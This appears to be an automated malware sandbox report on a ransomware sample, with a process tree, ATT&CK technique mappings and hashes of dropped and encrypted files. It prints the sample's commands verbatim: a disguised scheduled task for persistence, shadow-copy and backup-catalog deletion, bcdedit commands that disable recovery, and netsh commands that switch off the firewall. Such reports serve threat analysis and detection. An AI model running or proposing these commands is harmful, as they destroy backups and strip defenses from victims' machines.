C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#sqltdrz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
2⤵
PID:528

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
2⤵
PID:1796

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1404

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1396

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1376

\??\c:\windows\system32\sihost.exe
sihost.exe
2⤵
PID:1504

\??\c:\windows\system32\sihost.exe
sihost.exe
2⤵
PID:952

\??\c:\windows\system32\sihost.exe
sihost.exe
2⤵
PID:872

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1260

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1192

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1100

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
- Drops file in System32 directory
PID:1092

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:376

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:448

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:904

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:728

C:\Users\Admin\AppData\Local\Microsoft\_cG.exe
"C:\Users\Admin\AppData\Local\Microsoft\_cG.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1224

C:\Users\Admin\AppData\Local\Microsoft\_cG.exe
C:\Users\Admin\AppData\Local\Microsoft\_cG.exe
2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4468

C:\Users\Admin\AppData\Local\Microsoft\_cG.exe
"C:\Users\Admin\AppData\Local\Microsoft\_cG.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5052

C:\Users\Admin\AppData\Local\Microsoft\_cG.exe
C:\Users\Admin\AppData\Local\Microsoft\_cG.exe
4⤵
- Executes dropped EXE
PID:3796

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:5032

C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
4⤵
- Interacts with shadow copies
PID:4680

C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2108

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
4⤵
- Modifies boot configuration data using bcdedit
PID:3512

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
4⤵
- Modifies boot configuration data using bcdedit
PID:3560

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
4⤵
- Deletes backup catalog
PID:4632

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:3172

C:\Windows\system32\netsh.exe
netsh advfirewall set currentprofile state off
4⤵
- Modifies Windows Firewall
PID:808

C:\Windows\system32\netsh.exe
netsh firewall set opmode mode=disable
4⤵
- Modifies Windows Firewall
PID:1412

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
PID:1456

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\desktop\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
PID:948

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
PID:4928

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "F:\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
PID:820

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
3⤵
PID:4780

C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
4⤵
- Interacts with shadow copies
PID:3192

C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
4⤵
PID:148

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
4⤵
- Modifies boot configuration data using bcdedit
PID:672

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
4⤵
- Modifies boot configuration data using bcdedit
PID:3560

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
4⤵
- Deletes backup catalog
PID:4940

C:\Users\Admin\AppData\Local\Microsoft\y853e.exe
"C:\Users\Admin\AppData\Local\Microsoft\y853e.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1232

C:\Users\Admin\AppData\Local\Microsoft\y853e.exe
C:\Users\Admin\AppData\Local\Microsoft\y853e.exe
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:5024

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2576

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1152

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:4356

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:3536

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:3356

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 592 -s 924
1⤵
- Program crash
PID:4332

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 992 -s 2536
1⤵
- Program crash
PID:4264

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000002e8 00000080
1⤵
PID:3336

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000002dc 00000080
1⤵
PID:4816

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000001c0 00000080
1⤵
PID:4432

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000148 00000080
1⤵
PID:808

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000144 00000080
1⤵
PID:224

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000158 00000080
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3184

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000160 00000080
1⤵
PID:2504

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000200 00000080
1⤵
PID:992

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000001ac 00000080
1⤵
PID:3552

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 0000020c 00000080
1⤵
PID:3000

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000258 00000080
1⤵
PID:3928

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 0000028c 00000080
1⤵
PID:272

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000290 00000080
1⤵
PID:948

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000002a0 00000080
1⤵
- Loads dropped DLL
PID:2864

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000294 00000080
1⤵
PID:4656

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000002a0 00000080
1⤵
PID:1044

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000270 00000080
1⤵
PID:4780

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 0000026c 00000080
1⤵
PID:3560

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000001f4 00000080
1⤵
PID:672

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000150 00000080
1⤵
- Suspicious behavior: MapViewOfSection
PID:3968

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000100 00000080
1⤵
PID:820

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000188 00000080
1⤵
PID:1492

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000170 00000080
1⤵
PID:1008

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000130 00000080
1⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of FindShellTrayWindow
PID:1908

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 0000014c 00000080
1⤵
PID:4928

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000130 00000080
1⤵
PID:3192

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000178 00000080
1⤵
PID:4716

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000140 00000080
1⤵
PID:4940

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000178 00000080
1⤵
PID:4840

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000001d0 00000080
1⤵
PID:1428

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000104 00000080
1⤵
PID:544

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000178 00000080
1⤵
PID:1504

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000001ec 00000080
1⤵
PID:592

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000000d8 00000080
1⤵
PID:872

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems64.dll.id[F3547DDF-3483].[[email protected]].8base

Filesize
3.2MB

MD5
b9a1997740e1cce53946851bba684936

SHA1
96dc47ec72328bb5601ecf50ffdbfe46a136dce6

SHA256
c644c841140dfddd2caebb23899cdaed419620ffcf92f1d49176e859505495d7

SHA512
f6417288265fdb5bc7e10eb42859bb0a25da728725d4e347cfc67fe504fa3806cf0a6f04f670afb03ec41298865cc251a74ee2039fff434c83897c8bcfe6d14e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
573d77d4e77a445f5db769812a0be865

SHA1
7473d15ef2d3c6894edefd472f411c8e3209a99c

SHA256
5ec3f268845a50e309ae0d80bcee4f4dd4cd1b279ab1e64b523a057c11074f1c

SHA512
af2422a9790a91cdcbe39e6ef6d17899c2cbd4159b1b71ac56f633015068d3afc678fcef34892575bf59bdf7d5914ec6070864940d44130263fe84e28abba2dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe.log

Filesize
927B

MD5
ffe7bf10728fcdc9cfc28d6c2320a6f8

SHA1
af407275e9830d40889da2e672d2e6af118c8cb8

SHA256
72653cc5191f40cf26bcabcb5e0e41e53f23463f725007f74da78e36f9ec1522

SHA512
766753516d36ef1065d29dd982e0b6ee4e84c0c17eb2b0a6ca056f6c8e2a908e53c169bbcb01ab8b9ba1be1463fdd4007398d964aed59de761c1a6213842776c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ACF4.exe.log

Filesize
927B

MD5
ffe7bf10728fcdc9cfc28d6c2320a6f8

SHA1
af407275e9830d40889da2e672d2e6af118c8cb8

SHA256
72653cc5191f40cf26bcabcb5e0e41e53f23463f725007f74da78e36f9ec1522

SHA512
766753516d36ef1065d29dd982e0b6ee4e84c0c17eb2b0a6ca056f6c8e2a908e53c169bbcb01ab8b9ba1be1463fdd4007398d964aed59de761c1a6213842776c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\_cG.exe.log

Filesize
927B

MD5
ffe7bf10728fcdc9cfc28d6c2320a6f8

SHA1
af407275e9830d40889da2e672d2e6af118c8cb8

SHA256
72653cc5191f40cf26bcabcb5e0e41e53f23463f725007f74da78e36f9ec1522

SHA512
766753516d36ef1065d29dd982e0b6ee4e84c0c17eb2b0a6ca056f6c8e2a908e53c169bbcb01ab8b9ba1be1463fdd4007398d964aed59de761c1a6213842776c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\y853e.exe.log

Filesize
927B

MD5
ffe7bf10728fcdc9cfc28d6c2320a6f8

SHA1
af407275e9830d40889da2e672d2e6af118c8cb8

SHA256
72653cc5191f40cf26bcabcb5e0e41e53f23463f725007f74da78e36f9ec1522

SHA512
766753516d36ef1065d29dd982e0b6ee4e84c0c17eb2b0a6ca056f6c8e2a908e53c169bbcb01ab8b9ba1be1463fdd4007398d964aed59de761c1a6213842776c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

Filesize
985B

MD5
5c7267776f35240c1b20006557297ccd

SHA1
8e8b9b521fad9bca1e8522c396d2378d67592baf

SHA256
09d83a01bddf76617d9469745aa5c456164542edd558f381f4917d083b6d44ac

SHA512
30500f8ebd7d8a76929446da58a0b91be436dbd560b288ee09c67b25558beb6df762074143f27d82f51c542e7d653b187ef5f2d30436ebfc2e4e265ee62be9b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001c.db.id[F3547DDF-3483].[[email protected]].8base

Filesize
93KB

MD5
84f11be98f8b899e2e7cd6e39d97a3fe

SHA1
a9fb89c2f400211a27d0a3c438b7098d6b2f0f98

SHA256
23bbc8d08582d94b12fe9246838c5558ff3c9ba819582cc23db7b77f6e47c9c5

SHA512
7fdc2f85c50429dc08a23bec55082bc24262786e6dc49ad91a9ed7f8d0af045386d9a042326bce3682dcc38de2ed9ac1fdc165cab5a8774ec8e8da268ca3b312

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
631f4b3792b263fdda6b265e93be4747

SHA1
1d6916097d419198bfdf78530d59d0d9f3e12d45

SHA256
4e68d2d067c5680a2e55853ac58b16f199b09f1b9e5f2174605fff18da828976

SHA512
e0280041c4ca63971ab2524f25d2047820f031c1b4aeb6021a3367297045ddf6616ffccafb54630eb07fd154571d844329ebcc34d6ce64834cb77cba373e4fbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\_cG.exe

Filesize
628KB

MD5
cb0f99306d05042b8b3db064ac3489b9

SHA1
1a5e8b4435f97dfd09b764c82dba35868e792803

SHA256
71bd706cc0ace3774449282a9c1de5403f8f43dad118b9fbf4fc45cf4894f8e9

SHA512
fd69834d9da70fda36478de8106f288b7c7be48029a8ccc1fbc6ae8a7b4c3d47e189f262c525abad7a87ba1ed784adb57ae20794e6445af7c4d16185f5cafd41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\_cG.exe

Filesize
628KB

MD5
cb0f99306d05042b8b3db064ac3489b9

SHA1
1a5e8b4435f97dfd09b764c82dba35868e792803

SHA256
71bd706cc0ace3774449282a9c1de5403f8f43dad118b9fbf4fc45cf4894f8e9

SHA512
fd69834d9da70fda36478de8106f288b7c7be48029a8ccc1fbc6ae8a7b4c3d47e189f262c525abad7a87ba1ed784adb57ae20794e6445af7c4d16185f5cafd41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\_cG.exe

Filesize
628KB

MD5
cb0f99306d05042b8b3db064ac3489b9

SHA1
1a5e8b4435f97dfd09b764c82dba35868e792803

SHA256
71bd706cc0ace3774449282a9c1de5403f8f43dad118b9fbf4fc45cf4894f8e9

SHA512
fd69834d9da70fda36478de8106f288b7c7be48029a8ccc1fbc6ae8a7b4c3d47e189f262c525abad7a87ba1ed784adb57ae20794e6445af7c4d16185f5cafd41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\_cG.exe

Filesize
628KB

MD5
cb0f99306d05042b8b3db064ac3489b9

SHA1
1a5e8b4435f97dfd09b764c82dba35868e792803

SHA256
71bd706cc0ace3774449282a9c1de5403f8f43dad118b9fbf4fc45cf4894f8e9

SHA512
fd69834d9da70fda36478de8106f288b7c7be48029a8ccc1fbc6ae8a7b4c3d47e189f262c525abad7a87ba1ed784adb57ae20794e6445af7c4d16185f5cafd41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\_cG.exe

Filesize
628KB

MD5
cb0f99306d05042b8b3db064ac3489b9

SHA1
1a5e8b4435f97dfd09b764c82dba35868e792803

SHA256
71bd706cc0ace3774449282a9c1de5403f8f43dad118b9fbf4fc45cf4894f8e9

SHA512
fd69834d9da70fda36478de8106f288b7c7be48029a8ccc1fbc6ae8a7b4c3d47e189f262c525abad7a87ba1ed784adb57ae20794e6445af7c4d16185f5cafd41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\y853e.exe

Filesize
618KB

MD5
3f6d5376b6d40c82644287c7621dfc5b

SHA1
f54b9ed42b60eb6793cd55ed25e6f2bd6120218f

SHA256
94dbf6089ceccafd34ec1011941f18682361d71a9fbc54d1495dc0f9ec52169e

SHA512
3ea3e7c045c015e8c455ed9f550784d7af75c2cba263913ffaa210652f74ed036a6541b71f95d11663ee6dd062059cbcad94c1148243852d01722dd8780d010c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\y853e.exe

Filesize
618KB

MD5
3f6d5376b6d40c82644287c7621dfc5b

SHA1
f54b9ed42b60eb6793cd55ed25e6f2bd6120218f

SHA256
94dbf6089ceccafd34ec1011941f18682361d71a9fbc54d1495dc0f9ec52169e

SHA512
3ea3e7c045c015e8c455ed9f550784d7af75c2cba263913ffaa210652f74ed036a6541b71f95d11663ee6dd062059cbcad94c1148243852d01722dd8780d010c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\y853e.exe

Filesize
618KB

MD5
3f6d5376b6d40c82644287c7621dfc5b

SHA1
f54b9ed42b60eb6793cd55ed25e6f2bd6120218f

SHA256
94dbf6089ceccafd34ec1011941f18682361d71a9fbc54d1495dc0f9ec52169e

SHA512
3ea3e7c045c015e8c455ed9f550784d7af75c2cba263913ffaa210652f74ed036a6541b71f95d11663ee6dd062059cbcad94c1148243852d01722dd8780d010c

Download Submit
C:\Users\Admin\AppData\Local\Temp\2DDC.tmp\aa_nts.dll

Filesize
902KB

MD5
480a66902e6e7cdafaa6711e8697ff8c

SHA1
6ac730962e7c1dba9e2ecc5733a506544f3c8d11

SHA256
7eaaaa6010bbcd6bb8c9ad08d4b0966c7aedc9b2ac24758f170012ac36e508b5

SHA512
7d010cd47b7d1adf66f9c97afc6c3805997aa5c7cc6ff13eddee81f24cf2b95a3fe375ec5b3d6185c0bc8840b4ad91ae143c73a39af26391cc182ab6a1793ba5

Download Submit
C:\Users\Admin\AppData\Local\Temp\2DDC.tmp\aa_nts.msg

Filesize
46B

MD5
3f05819f995b4dafa1b5d55ce8d1f411

SHA1
404449b79a16bfc4f64f2fd55cd73d5d27a85d71

SHA256
7e0bf0cbd06a087500a9c3b50254df3a8a2c2980921ab6a62ab1121941c80fc0

SHA512
34abb7df8b3a68e1649ff0d2762576a4d4e65da548e74b1aa65c2b82c1b89f90d053ecddac67c614ca6084dc5b2cb552949250fb70f49b536f1bcb0057717026

Download Submit
C:\Users\Admin\AppData\Local\Temp\2DDC.tmp\svchost.exe

Filesize
798KB

MD5
90aadf2247149996ae443e2c82af3730

SHA1
050b7eba825412b24e3f02d76d7da5ae97e10502

SHA256
ee573647477339784dcef81024de1be1762833a20e5cc2b89a93e47d05b86b6a

SHA512
eec32bb82b230dd309c29712e72d4469250e651449e127479d178eddbafd5a46ec8048a753bc2c1a0fdf1dc3ed72a9453ca66fb49cbf0f95a12704e5427182be

Download Submit
C:\Users\Admin\AppData\Local\Temp\2DDC.tmp\svchost.exe

Filesize
798KB

MD5
90aadf2247149996ae443e2c82af3730

SHA1
050b7eba825412b24e3f02d76d7da5ae97e10502

SHA256
ee573647477339784dcef81024de1be1762833a20e5cc2b89a93e47d05b86b6a

SHA512
eec32bb82b230dd309c29712e72d4469250e651449e127479d178eddbafd5a46ec8048a753bc2c1a0fdf1dc3ed72a9453ca66fb49cbf0f95a12704e5427182be

Download Submit
C:\Users\Admin\AppData\Local\Temp\ACF4.exe

Filesize
628KB

MD5
cb0f99306d05042b8b3db064ac3489b9

SHA1
1a5e8b4435f97dfd09b764c82dba35868e792803

SHA256
71bd706cc0ace3774449282a9c1de5403f8f43dad118b9fbf4fc45cf4894f8e9

SHA512
fd69834d9da70fda36478de8106f288b7c7be48029a8ccc1fbc6ae8a7b4c3d47e189f262c525abad7a87ba1ed784adb57ae20794e6445af7c4d16185f5cafd41

Download Submit
C:\Users\Admin\AppData\Local\Temp\ACF4.exe

Filesize
628KB

MD5
cb0f99306d05042b8b3db064ac3489b9

SHA1
1a5e8b4435f97dfd09b764c82dba35868e792803

SHA256
71bd706cc0ace3774449282a9c1de5403f8f43dad118b9fbf4fc45cf4894f8e9

SHA512
fd69834d9da70fda36478de8106f288b7c7be48029a8ccc1fbc6ae8a7b4c3d47e189f262c525abad7a87ba1ed784adb57ae20794e6445af7c4d16185f5cafd41

Download Submit
C:\Users\Admin\AppData\Local\Temp\ACF4.exe

Filesize
628KB

MD5
cb0f99306d05042b8b3db064ac3489b9

SHA1
1a5e8b4435f97dfd09b764c82dba35868e792803

SHA256
71bd706cc0ace3774449282a9c1de5403f8f43dad118b9fbf4fc45cf4894f8e9

SHA512
fd69834d9da70fda36478de8106f288b7c7be48029a8ccc1fbc6ae8a7b4c3d47e189f262c525abad7a87ba1ed784adb57ae20794e6445af7c4d16185f5cafd41

Download Submit
C:\Users\Admin\AppData\Local\Temp\ACF4.exe

Filesize
628KB

MD5
cb0f99306d05042b8b3db064ac3489b9

SHA1
1a5e8b4435f97dfd09b764c82dba35868e792803

SHA256
71bd706cc0ace3774449282a9c1de5403f8f43dad118b9fbf4fc45cf4894f8e9

SHA512
fd69834d9da70fda36478de8106f288b7c7be48029a8ccc1fbc6ae8a7b4c3d47e189f262c525abad7a87ba1ed784adb57ae20794e6445af7c4d16185f5cafd41

Download Submit
C:\Users\Admin\AppData\Local\Temp\ACF4.exe

Filesize
628KB

MD5
cb0f99306d05042b8b3db064ac3489b9

SHA1
1a5e8b4435f97dfd09b764c82dba35868e792803

SHA256
71bd706cc0ace3774449282a9c1de5403f8f43dad118b9fbf4fc45cf4894f8e9

SHA512
fd69834d9da70fda36478de8106f288b7c7be48029a8ccc1fbc6ae8a7b4c3d47e189f262c525abad7a87ba1ed784adb57ae20794e6445af7c4d16185f5cafd41

Download Submit
C:\Users\Admin\AppData\Local\Temp\B283.exe

Filesize
576KB

MD5
8be029b88548450edb5e6b65a60cbfc9

SHA1
59d11404e51389f8bbadbd32cfdc574834fa1be4

SHA256
8f703dbe94ad3c9bfee41a6b920cd7765f0a948cae9bdf196b080253411a5d23

SHA512
7fadf75177261266ba0e5a24564bbbb0edbe5daaecd45ba022f9dbf11a7b86564b48782ba0a62a5462fccd1b5f7c084133f371a3480f55611a91740483977fb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\B283.exe

Filesize
576KB

MD5
8be029b88548450edb5e6b65a60cbfc9

SHA1
59d11404e51389f8bbadbd32cfdc574834fa1be4

SHA256
8f703dbe94ad3c9bfee41a6b920cd7765f0a948cae9bdf196b080253411a5d23

SHA512
7fadf75177261266ba0e5a24564bbbb0edbe5daaecd45ba022f9dbf11a7b86564b48782ba0a62a5462fccd1b5f7c084133f371a3480f55611a91740483977fb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\B283.exe

Filesize
576KB

MD5
8be029b88548450edb5e6b65a60cbfc9

SHA1
59d11404e51389f8bbadbd32cfdc574834fa1be4

SHA256
8f703dbe94ad3c9bfee41a6b920cd7765f0a948cae9bdf196b080253411a5d23

SHA512
7fadf75177261266ba0e5a24564bbbb0edbe5daaecd45ba022f9dbf11a7b86564b48782ba0a62a5462fccd1b5f7c084133f371a3480f55611a91740483977fb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\BE8A.exe

Filesize
298KB

MD5
966f6925f2e2ea12f260ad305d5bfc69

SHA1
baeadfda934497ddc676a78e886935e4a70ce214

SHA256
0bae6a5e4eb4347a99a45dcc9bec3d11da7f3f3e1743e3533c83cf9154b5d635

SHA512
9fadab42dabc13b3e65ef99e4a5feaa8af18c09fec710409091a8aeb48d3f1e8462c31cdca553eb584f1a1475506645cf52f510bd624197a5a9e742afab0ce74

Download Submit
C:\Users\Admin\AppData\Local\Temp\BE8A.exe

Filesize
298KB

MD5
966f6925f2e2ea12f260ad305d5bfc69

SHA1
baeadfda934497ddc676a78e886935e4a70ce214

SHA256
0bae6a5e4eb4347a99a45dcc9bec3d11da7f3f3e1743e3533c83cf9154b5d635

SHA512
9fadab42dabc13b3e65ef99e4a5feaa8af18c09fec710409091a8aeb48d3f1e8462c31cdca553eb584f1a1475506645cf52f510bd624197a5a9e742afab0ce74

Download Submit
C:\Users\Admin\AppData\Local\Temp\E9B2.exe

Filesize
9.9MB

MD5
4c328b215a84c1b2c982a3268b4a0cea

SHA1
addaaa78ce3f457d008a4958b2c1a404dcc62eaa

SHA256
3761032e760a2bcc61854a0c7cf22e8e991af0ed60fac92b981853eadda00d1a

SHA512
bd1a0bb98487781d8a6a5145e30544112d511c4510eda59150f23ff605db4ded5f42869a5be9ff0ff7fc570ab2d9f05c13223f3a420a7fa3b3ad7258f2084598

Download Submit
C:\Users\Admin\AppData\Local\Temp\E9B2.exe

Filesize
9.9MB

MD5
4c328b215a84c1b2c982a3268b4a0cea

SHA1
addaaa78ce3f457d008a4958b2c1a404dcc62eaa

SHA256
3761032e760a2bcc61854a0c7cf22e8e991af0ed60fac92b981853eadda00d1a

SHA512
bd1a0bb98487781d8a6a5145e30544112d511c4510eda59150f23ff605db4ded5f42869a5be9ff0ff7fc570ab2d9f05c13223f3a420a7fa3b3ad7258f2084598

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2pjqko4m.vuz.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
